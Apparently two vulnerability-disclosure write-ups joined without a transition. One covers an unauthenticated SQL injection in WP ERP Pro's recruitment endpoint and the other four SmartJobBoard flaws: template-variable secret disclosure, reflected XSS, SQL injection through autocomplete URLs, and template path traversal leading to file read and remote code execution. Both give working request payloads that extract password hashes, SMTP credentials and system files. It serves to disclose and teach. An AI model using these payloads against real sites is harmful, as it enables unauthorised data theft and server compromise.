WP ERP Pro is the paid extension of the popular WP ERP plugin, bundling HR, CRM, and accounting modules into a single WordPress installation. The bug we are after exists inside a REST endpoint in the HR module.

Vulnerability: Unauthenticated SQL Injection (Versions <= 1.5.1)

The HR module of the plugin contains a RecruitmentController class which exposes a /wp-json/erp/v1/hrm/recruitment/jobs endpoint which is defined in the code snippet below:

public function register_routes() {
    register_rest_route( $this->namespace, '/' . $this->rest_base . '/jobs', [
        [
            'methods'             => WP_REST_Server::READABLE,
            'callback'            => [ $this, 'get_jobs' ],
            'args'                => $this->get_collection_params(),
            'permission_callback' => function( $request ) {
                header( 'Access-Control-Allow-Origin: *' );
                header( 'Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE' );
                return true;
            },
        ],
        'schema' => [ $this, 'get_public_item_schema' ],
    ] );
}

One detail immediately stands out. The permission_callback unconditionally returns true, which means that no authentication is required to reach the endpoint. That on its own is not a bug, but it opens the handler up to exploitation by anyone who can issue a request to it.

Requests to the endpoint are processed by the get_jobs function:

public function get_jobs( \WP_REST_Request $request ) {
    global $wpdb;

    $items_per_page  = ( isset( $request['per_page'] ) ) ? $request['per_page'] : 10;
    $page            = ( isset( $request['page'] ) ) ? $request['page'] : 1;
    $offset          = ( $page - 1 ) * $items_per_page;
    $today           = date( 'Y-m-d' );

    $query = "SELECT
            post.*
            FROM {$wpdb->prefix}posts AS post
            INNER JOIN {$wpdb->prefix}postmeta as pmeta
            ON pmeta.post_id = post.id
            WHERE post.post_type = 'erp_hr_recruitment'
            AND (
                (pmeta.meta_key = '_expire_date' AND pmeta.meta_value >= '$today')
               OR (pmeta.meta_key = '_expire_date' AND pmeta.meta_value = '')
            ) ";

    if ( isset( $request['status'] ) && $request['status'] !== '' && $request['status'] !== '-1' && ( $request['status'] === 'draft' || $request['status'] === 'pending' ) ) {
        $query .= " AND post.post_status='" . $request['status'] . "'";
    }
    if ( isset( $request['status'] ) && $request['status'] === 'publish' && $request['status'] !== '' && $request['status'] !== '-1' ) {
        $query .= " AND post.post_status='publish' AND ( DATE(pmeta.meta_value) > CURDATE() OR DATE(pmeta.meta_value) = ' ')";
    }
    if ( isset( $request['status'] ) && $request['status'] === 'expired' && $request['status'] !== '' && $request['status'] !== '-1' ) {
        $query .= " AND post.post_status='publish' AND ( DATE(pmeta.meta_value) < CURDATE() AND DATE(pmeta.meta_value) <> ' ')";
    }
    if ( isset( $request['search_key'] ) && $request['search_key'] !== '' ) {
        $query .= " AND post.post_title LIKE '%" . $request['search_key'] . "%'";
    }

    $query .= " ORDER BY id DESC LIMIT {$offset}, {$items_per_page}";

    $results = $wpdb->get_results( $query );
    ...
}

The function reads a search_key query parameter from the request and concatenates it into a LIKE clause without any sanitization and executes the resulting query as a raw SQL statement using $wpdb->get_results().

Because the search_key value lands between single quotes inside a LIKE query, all we need to do is close the quote, append an arbitrary SQL statement, and comment out the remaining query.

While WordPress’ wpdb driver does not allow stacked queries, we can still exploit this bug to get full read access to any table in the database by using a UNION SELECT statement.

The combination of no authentication and direct string concatenation allows us to read arbitrary data from the WordPress database, including the wp_users table (usernames, password hashes, emails) and the wp_options table where plugins routinely store API keys, SMTP credentials, and other secrets.

So, how does this translate into a real-world exploit?

To pull this off, we have to terminate the LIKE clause early and inject a UNION SELECT clause targeting a different table, ensuring our column count matches the number of columns in WordPress’ posts table.

For instance, we can make this request to read the username and password hash columns from the wp_users table. wp_posts has 23 columns, so the UNION matches that shape and pads out the rest of the columns with null values:

curl -G "https://target.com/wp-json/erp/v1/hrm/recruitment/jobs" \
  --data-urlencode "search_key=x%' UNION SELECT null,null,null,null,user_login,user_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM wp_users-- -"

The resulting response returns a list of arrays containing the usernames and password hash values from the wp_users table in the title and description parameters.

At the time of publication, no patch has been issued for this vulnerability. It is recommended to either disable the plugin or implement a manual patch until an official fix is released.

Disclosure Timeline:

• Vendor Contacted: 26/02/2026
• Vendor Response: No response
• Public Disclosure: 21/05/2026
• CVE Record: https://www.cve.org/CVERecord?id=CVE-2026-4834
• Wordfence Advisory: https://www.wordfence.com/threat-intel/vulnerabilities/id/d3849db8-5c9e-410e-be53-c9ab76162630

After some poking around, I realized that the site only responded to variable names and not much else. For instance, entering {$url} into an input field would echo the value “/ajax/” and any other template injection payloads were either ignored or simply returned blank results.

Digging deeper into the site’s JavaScript and CSS files revealed that it was running software by SmartJobBoard. Fortunately for me, although no longer supported, older versions of SmartJobBoard had a self-hosted option and I could potentially get a copy of the software to review.

A quick GitHub keyword search later led me to repositories containing versions 4.2 and 5.0.3. With access to the source code which was powering the site I was able look at what was happening behind the scenes

Vulnerability #1: Information Disclosure (Versions 4.2 – 5.0.13)

In the source code I found a TemplateProcessor class. As the name suggests, it is responsible for processing page templates and uses the Smarty library to do so.

It registers several custom plugins and also initializes some variables to be used when rendering pages. Of particular interest were the translate plugin, and registerGlobalVariables method.

$this->registerPlugin('block', 'tr', array(&$this, 'translate'));
...
$this->registerGlobalVariables();

Looking at the translate plugin, it makes a call to a replace_with_template_vars method each time the <tr>…</tr> element is used in a template. That method looks like this:

function replace_with_template_vars($res, &$smarty)
{
    if (preg_match_all('/{[$]([a-zA-Z0-9_.]+)}/', $res, $matches)) {
        foreach($matches[1] as $varName) {
            $varNameArray = explode('.', $varName);
            $value = $smarty->getTemplateVars(is_array($varNameArray) ? $varNameArray[0] : $varName);
            if (is_array($value)) {
                if (is_array($varNameArray)) {
                    $varNameArraySize = sizeof($varNameArray);
                    for ($i = 1; $i < $varNameArraySize; $i++) {
                        if (isset($value[$varNameArray[$i]])) {
                            $value = $value[$varNameArray[$i]];
                        } else {
                            $value = '';
                            break;
                        }
                    }
                } else {
                    $value = '';
                }
            }
            
            $value = str_replace(array('\\', '$'), array('\\\\', '\$'), $value);
            $res = preg_replace('/{[$]'.$varName.'}/u',$value,$res);
        }
    }
    return $res;
}

It replaces string placeholders like {$current_user.username} with their corresponding values in the $smarty object. For example, the string “Hello {$current_user.username}” would be rendered on a page as “Hello Kuda”. Since it reads values directly from the $smarty object we can effectively access any values assigned to it.

Now going back to that registerGlobalVariables() method:

function registerGlobalVariables()
{
    $variables = SJB_System::getGlobalTemplateVariables();
	foreach ($variables as $name => $value) {
		$this->assign($name, $value);
	}
…
}

The method assigns values from a getGlobalTemplateVariables function into the $smarty object. Notably getGlobalTemplateVariables creates a “settings” variable

SJB_System::setGlobalTemplateVariable('settings', SJB_Settings::getSettings());

It uses a getSettings function to load some values to the variable, that function makes a call to loadSettings, which reads values from the settings table and assigns them to the settings variable:

public static function loadSettings()
{
    self::$settings = array();
    $settingsInfo = SJB_DB::query("SELECT * FROM `settings`");
	
    foreach ($settingsInfo as $settingInfo) {
        self::$settings[$settingInfo['name']] = $settingInfo['value'];
    }
}

Altogether, this chain of events makes the information disclosure vulnerability possible. By abusing the logic of translate plugin we can read any value from the settings table. The payload to accomplish that will look something like this:

$GLOBALS.settings.[value]

For instance we can retrieve the SMTP password by entering $GLOBALS.settings.smtp_password into any reflected input field

This vulnerability exposes sensitive system configuration values including, SMTP credentials (smtp_host, smtp_username, smtp_password), API keys, and admin credentials (username, password).

Vulnerability #2: Reflected cross site scripting (XSS) (Versions 4.2 – 5.0.13)

Moving on from the template processor, I discovered that the HTML form on the login page loads values from the URL parameters into hidden input fields without any sanitization

<form ...>
    <input type="hidden" name="return_url" value="{$return_url}" />
    <input type="hidden" name="action" value="login" />
    {if $shopping_cart}<input type="hidden" name="shopping_cart" value="{$shopping_cart}" />{/if}
    {if $proceedToPosting}<input type="hidden" name="proceed_to_posting" value="{$proceedToPosting}" />{/if}
    {if $productSID}<input type="hidden" name="productSID" value="{$productSID}" />{/if}
    
    ...
</form>

This creates a reflected cross-site scripting (XSS) vulnerability, allowing us to include any arbitrary HTML or Javascript code into the page. For instance, we can use the “shopping_cart” parameter to inject HTML into the page by crafting a URL in this format:

{site}/login?shopping_cart="><h1>"It's a leap of faith. That's all it is Miles, a leap of faith.</h1>

Vulnerability #3: SQL Injection (Version 4.2)

Continuing my analysis of the system’s features, I came across an autocomplete class. It powers the auto-suggestion functionality for various input fields across the application.

It uses regular expression matching to extract parameters from the request URL, which are then used to build an SQL query that fetches similar terms from the database

...
preg_match("(.*/autocomplete/{$field}/{$fieldType}/([a-zA-Z]*)/?)", $requestUri, $tablePrefix);
$tablePrefix = SJB_DB::quote(!empty($tablePrefix[1]) ? $tablePrefix[1] : '');
...
$query = SJB_Request::getVar('q', false);

Critically, the resultant query is constructed using user-provided values, allowing us to specify both the table and column to search for the autocomplete suggestions in.

elseif ($fieldType == 'string') {
    $additionalCondition = '';
    $fieldParents        = explode('_', $field);
    $fieldName           = array_pop($fieldParents);

    if ($fieldName == 'City') {
        if ($viewType == 'input') {
            $tablePrefix = 'locations';
            $field       = 'City';
        }
        elseif ($viewType == 'search' && $tablePrefix == 'listings') {
            $listingTypeSid      = SJB_ListingTypeManager::getListingTypeSIDByID($listingTypeID);
            $additionalCondition = '`listing_type_sid` = ' . $listingTypeSid . ' AND';
        }
    }

    $result = SJB_DB::query("SELECT DISTINCT `{$field}` as `value`, COUNT(*) `count` FROM `{$tablePrefix}` WHERE " . $additionalCondition . " `{$field}` LIKE ?s GROUP BY `{$field}` ORDER BY `count` DESC LIMIT 0 , 5", $queryCriterion);
}

The URLs follow the pattern:

{site url}/system/miscellaneous/autocomplete/{column}/string/{table}/padding/paddng/?q={search term}

For instance, we can fetch the passwords and usernames of admin accounts from the administrator table by crafting this url:

{url}/system/miscellaneous/autocomplete/password/string/administrator/padding/padding/?q=2

Vulnerability #4: Template Injection and Remote Code Execution (Versions 4.2 – 5.0.13)

While browsing through the source code of various pages, I noticed that some of them allow users to specify the page template to be loaded via a “template” URL parameter. In the PHP class for the login page i found the following line:

$template = SJB_Request::getVar('template', 'login.tpl');

It attempts to retrieve the “template” value from the request parameters. If it is not specified it defaults to the “login.tpl” template. Later in the same class, the $template variable is then passed directly into the template processor’s display method, which processes and renders the specified page template:

$tp->display($template);

This effectively gives us full control over what is displayed on the page by allowing us to specify any file on the server to be loaded. For instance, we can achieve an arbitrary file read by crafting a url to load the /etc/passwd file:

{site url}/login?template=/../../../../etc/passwd

This vulnerability becomes even more critical when combined with an unauthenticated file upload flaw in the ajax_file_upload_handler class. Using it we can upload files to the /files/files directory.

We can then execute the uploaded files by creating a url that points the template variable to it

{site url}/login?template=../../../files/files/shell.pdf

This sequence of events ultimately leads to a critical, unauthenticated remote code execution vulnerability, granting us full system access on any vulnerable website.

And that’s it. Be sure to drop by again for more pentesting and programming adventures. Till next time!

Disclosure Timeline

• Vendor Contact: 24/01/2025
• Vendor Response: Affected versions have reached end-of-life and are no longer supported
• Public Disclosure: 01/08/2025